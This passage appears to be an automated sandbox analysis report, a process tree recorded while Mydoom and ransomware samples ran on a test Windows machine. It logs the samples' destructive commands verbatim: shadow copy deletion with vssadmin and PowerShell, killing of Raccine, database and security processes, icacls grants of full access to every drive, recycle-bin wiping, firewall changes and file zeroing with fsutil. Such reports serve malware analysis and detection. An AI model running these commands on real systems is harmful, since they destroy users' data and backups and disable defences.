                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1532
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gusanito.com/esp/tarjetas/postales/buenos_deseos/excelente_dia/974
                  2⤵
                  • Enumerates system info in registry
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:1296
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffa838b46f8,0x7ffa838b4708,0x7ffa838b4718
                    3⤵
                      PID:5428
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:2
                      3⤵
                        PID:1396
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
                        3⤵
                          PID:5784
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
                          3⤵
                            PID:4120
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                            3⤵
                              PID:6436
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                              3⤵
                                PID:6628
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
                                3⤵
                                  PID:4800
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
                                  3⤵
                                    PID:3600
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                    3⤵
                                      PID:6440
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
                                      3⤵
                                        PID:9820
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,11754314823408590683,604689329818502669,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
                                        3⤵
                                          PID:12876
                                    • C:\Users\Admin\Desktop\New folder\Mydoom\d42fc4dabd9a9e74156d1a856cb542ed2e0796d2d7c6b976c0ac5421a87f9806.exe
                                      "C:\Users\Admin\Desktop\New folder\Mydoom\d42fc4dabd9a9e74156d1a856cb542ed2e0796d2d7c6b976c0ac5421a87f9806.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      PID:2392
                                    • C:\Users\Admin\Desktop\New folder\Mydoom\d66f6565e97f43030ff6fba9c9550894aad05affb66efaf561ec229d80b0a691.exe
                                      "C:\Users\Admin\Desktop\New folder\Mydoom\d66f6565e97f43030ff6fba9c9550894aad05affb66efaf561ec229d80b0a691.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      PID:1736
                                    • C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
                                      "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe"
                                      1⤵
                                      • Checks computer location settings
                                      • Drops startup file
                                      • Executes dropped EXE
                                      • Modifies WinLogon
                                      • Suspicious behavior: RenamesItself
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      • System policy modification
                                      PID:4640
                                      • C:\Windows\SYSTEM32\taskkill.exe
                                        "taskkill" /F /IM RaccineSettings.exe
                                        2⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1108
                                      • C:\Windows\SYSTEM32\reg.exe
                                        "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
                                        2⤵
                                          PID:5792
                                        • C:\Windows\SYSTEM32\reg.exe
                                          "reg" delete HKCU\Software\Raccine /F
                                          2⤵
                                          • Modifies registry key
                                          PID:6552
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          "schtasks" /DELETE /TN "Raccine Rules Updater" /F
                                          2⤵
                                            PID:6908
                                          • C:\Windows\SYSTEM32\sc.exe
                                            "sc.exe" config Dnscache start= auto
                                            2⤵
                                            • Launches sc.exe
                                            PID:6160
                                          • C:\Windows\SYSTEM32\netsh.exe
                                            "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                            2⤵
                                            • Modifies Windows Firewall
                                            PID:5728
                                          • C:\Windows\SYSTEM32\sc.exe
                                            "sc.exe" config FDResPub start= auto
                                            2⤵
                                            • Launches sc.exe
                                            PID:6216
                                          • C:\Windows\SYSTEM32\sc.exe
                                            "sc.exe" config SSDPSRV start= auto
                                            2⤵
                                            • Launches sc.exe
                                            PID:5984
                                          • C:\Windows\SYSTEM32\sc.exe
                                            "sc.exe" config upnphost start= auto
                                            2⤵
                                            • Launches sc.exe
                                            PID:6868
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              3⤵
                                                PID:6612
                                            • C:\Windows\SYSTEM32\sc.exe
                                              "sc.exe" config SQLTELEMETRY start= disabled
                                              2⤵
                                              • Launches sc.exe
                                              PID:5164
                                            • C:\Windows\SYSTEM32\sc.exe
                                              "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                              2⤵
                                              • Launches sc.exe
                                              PID:6600
                                            • C:\Windows\SYSTEM32\sc.exe
                                              "sc.exe" config SQLWriter start= disabled
                                              2⤵
                                              • Launches sc.exe
                                              PID:4224
                                            • C:\Windows\SYSTEM32\sc.exe
                                              "sc.exe" config SstpSvc start= disabled
                                              2⤵
                                              • Launches sc.exe
                                              PID:4824
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM mspub.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5436
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM excel.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:6612
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM firefoxconfig.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:6688
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM thebat64.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:9784
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" IM thunderbird.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              PID:10244
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM CNTAoSMgr.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:7984
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM agntsvc.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:8500
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM mydesktopqos.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2360
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                3⤵
                                                  PID:6688
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM dbsnmp.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:13020
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM ocomm.exe /F
                                                2⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:13088
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM thebat.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:12152
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM mydesktopservice.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:12248
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM infopath.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6812
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM sqlwriter.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:8520
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM xfssvccon.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:7368
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM steam.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:9776
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM mysqld.exe /F
                                                2⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:10356
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM mbamtray.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:7532
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM mspub.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:7540
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM tbirdconfig.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:7564
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM sqbcoreservice.exe /F
                                                2⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:9940
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM encsvc.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:11160
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM Ntrtscan.exe /F
                                                2⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:10680
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM zoolz.exe /F
                                                2⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:8164
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM dbeng50.exe /F
                                                2⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:9812
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM isqlplussvc.exe /F
                                                2⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:10608
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM tmlisten.exe /F
                                                2⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:8288
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  3⤵
                                                    PID:3596
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM mydesktopservice.exe /F
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:8800
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM ocautoupds.exe /F
                                                  2⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:9984
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM onenote.exe /F
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:10048
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM msftesql.exe /F
                                                  2⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:9988
                                                • C:\Windows\SYSTEM32\netsh.exe
                                                  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                                  2⤵
                                                  • Modifies Windows Firewall
                                                  PID:11724
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM winword.exe /F
                                                  2⤵
                                                  • Kills process with taskkill
                                                  PID:12828
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM ocssd.exe /F
                                                  2⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:11248
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM sqlservr.exe /F
                                                  2⤵
                                                    PID:10220
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM PccNTMon.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:12320
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM powerpnt.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:13376
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM synctime.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6988
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM mydesktopqos.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:12480
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM oracle.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:11428
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM mysqld-nt.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:6716
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM msaccess.exe /F
                                                    2⤵
                                                    • Kills process with taskkill
                                                    PID:12448
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM visio.exe /F
                                                    2⤵
                                                      PID:9508
                                                    • C:\Windows\SYSTEM32\arp.exe
                                                      "arp" -a
                                                      2⤵
                                                        PID:6436
                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                        "taskkill.exe" /IM wordpad.exe /F
                                                        2⤵
                                                        • Kills process with taskkill
                                                        PID:10684
                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                        "taskkill.exe" /IM outlook.exe /F
                                                        2⤵
                                                        • Kills process with taskkill
                                                        PID:8432
                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                        "taskkill.exe" /IM sqlagent.exe /F
                                                        2⤵
                                                          PID:7368
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM mysqld-opt.exe /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:1680
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM sqlbrowser.exe /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:8064
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                                          2⤵
                                                            PID:12940
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              3⤵
                                                                PID:5728
                                                            • C:\Windows\SYSTEM32\icacls.exe
                                                              "icacls" "C:*" /grant Everyone:F /T /C /Q
                                                              2⤵
                                                              • Modifies file permissions
                                                              PID:7772
                                                            • C:\Windows\SYSTEM32\icacls.exe
                                                              "icacls" "D:*" /grant Everyone:F /T /C /Q
                                                              2⤵
                                                              • Modifies file permissions
                                                              PID:9684
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                3⤵
                                                                  PID:5164
                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                "icacls" "Z:*" /grant Everyone:F /T /C /Q
                                                                2⤵
                                                                • Modifies file permissions
                                                                PID:7792
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                                                2⤵
                                                                  PID:1984
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
                                                                  2⤵
                                                                    PID:10292
                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                    2⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:6780
                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                                                                    2⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:7052
                                                                  • C:\Windows\System32\notepad.exe
                                                                    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                                                                    2⤵
                                                                    • Opens file in notepad (likely ransom note)
                                                                    PID:13296
                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                    2⤵
                                                                      PID:10836
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        3⤵
                                                                          PID:7672
                                                                        • C:\Windows\system32\PING.EXE
                                                                          ping 127.0.0.7 -n 3
                                                                          3⤵
                                                                          • Runs ping.exe
                                                                          PID:9528
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\5458f18e36de21d20b713f7acd8575fc8a86330c466e1b9dc6f41bc81f3e79fc.exe
                                                                        2⤵
                                                                          PID:9816
                                                                          • C:\Windows\system32\choice.exe
                                                                            choice /C Y /N /D Y /T 3
                                                                            3⤵
                                                                              PID:5940
                                                                        • C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\cc3b570fa8f87354f06a20d8873c45087684c217f1b434b3b0048acd96fe3e64.exe
                                                                          "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\cc3b570fa8f87354f06a20d8873c45087684c217f1b434b3b0048acd96fe3e64.exe"
                                                                          1⤵
                                                                          • Checks computer location settings
                                                                          • Drops startup file
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Drops desktop.ini file(s)
                                                                          • Drops file in System32 directory
                                                                          • Drops file in Program Files directory
                                                                          • Suspicious behavior: RenamesItself
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:756
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe"
                                                                            2⤵
                                                                              PID:3660
                                                                              • C:\Windows\system32\mode.com
                                                                                mode con cp select=1251
                                                                                3⤵
                                                                                  PID:7016
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin delete shadows /all /quiet
                                                                                  3⤵
                                                                                  • Interacts with shadow copies
                                                                                  PID:10084
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe"
                                                                                2⤵
                                                                                  PID:12960
                                                                                  • C:\Windows\system32\mode.com
                                                                                    mode con cp select=1251
                                                                                    3⤵
                                                                                      PID:11772
                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                      vssadmin delete shadows /all /quiet
                                                                                      3⤵
                                                                                      • Interacts with shadow copies
                                                                                      PID:11656
                                                                                  • C:\Windows\System32\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                                                    2⤵
                                                                                      PID:12440
                                                                                    • C:\Windows\System32\mshta.exe
                                                                                      "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                                                      2⤵
                                                                                        PID:12476
                                                                                    • C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\dd286a4d79d0f4c2b906073c7f46680252ca09c1c39b0dc12c92097c56662876.exe
                                                                                      "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\dd286a4d79d0f4c2b906073c7f46680252ca09c1c39b0dc12c92097c56662876.exe"
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1012
                                                                                    • C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
                                                                                      "C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe"
                                                                                      1⤵
                                                                                      • Checks computer location settings
                                                                                      • Drops startup file
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: RenamesItself
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4840
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        "taskkill" /F /IM RaccineSettings.exe
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5424
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
                                                                                        2⤵
                                                                                          PID:6156
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "reg" delete HKCU\Software\Raccine /F
                                                                                          2⤵
                                                                                          • Modifies registry key
                                                                                          PID:6504
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /DELETE /TN "Raccine Rules Updater" /F
                                                                                          2⤵
                                                                                            PID:7016
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            "sc.exe" config Dnscache start= auto
                                                                                            2⤵
                                                                                            • Launches sc.exe
                                                                                            PID:6552
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            "sc.exe" config FDResPub start= auto
                                                                                            2⤵
                                                                                            • Launches sc.exe
                                                                                            PID:6936
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            "sc.exe" config SSDPSRV start= auto
                                                                                            2⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4512
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                                                                            2⤵
                                                                                              PID:6140
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "sc.exe" config upnphost start= auto
                                                                                              2⤵
                                                                                              • Launches sc.exe
                                                                                              PID:1820
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "sc.exe" config SQLTELEMETRY start= disabled
                                                                                              2⤵
                                                                                              • Launches sc.exe
                                                                                              PID:3596
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                              2⤵
                                                                                              • Launches sc.exe
                                                                                              PID:856
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "sc.exe" config SQLWriter start= disabled
                                                                                              2⤵
                                                                                              • Launches sc.exe
                                                                                              PID:4816
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "sc.exe" config SstpSvc start= disabled
                                                                                              2⤵
                                                                                              • Launches sc.exe
                                                                                              PID:6352
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM mspub.exe /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:9356
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM firefoxconfig.exe /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:9376
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM excel.exe /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:9388
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" /IM thebat64.exe /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:10820
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "taskkill.exe" IM thunderbird.exe /F
